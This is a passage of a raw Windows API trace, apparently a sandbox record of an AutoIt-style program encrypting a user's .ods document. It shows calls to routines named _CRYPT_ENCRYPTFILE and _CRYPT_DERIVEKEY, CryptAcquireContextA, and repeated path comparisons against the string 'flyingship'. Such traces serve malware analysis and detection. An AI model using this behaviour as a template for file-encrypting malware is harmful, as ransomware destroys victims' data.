dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.484] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0175.484] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.484] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0175.484] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.485] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0175.485] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.485] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.485] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.485] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.485] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0x90add8 [0175.486] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.486] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.486] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0x90add8 [0175.486] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.486] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Odo7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="do7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QUeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UeZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZcP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cP1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NL2G.ods\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.488] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.488] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0175.488] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.488] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.488] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.489] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.489] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.489] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0x4bae3550, ftLastWriteTime.dwHighDateTime=0x1d5e28a, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0x90ae18 [0175.489] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0175.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.489] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.489] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.489] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.489] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.489] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0175.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0175.490] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.490] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.490] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0175.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.490] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0175.491] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.491] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.491] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0175.491] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.491] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.491] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.491] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.492] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.492] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0175.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.492] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.492] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 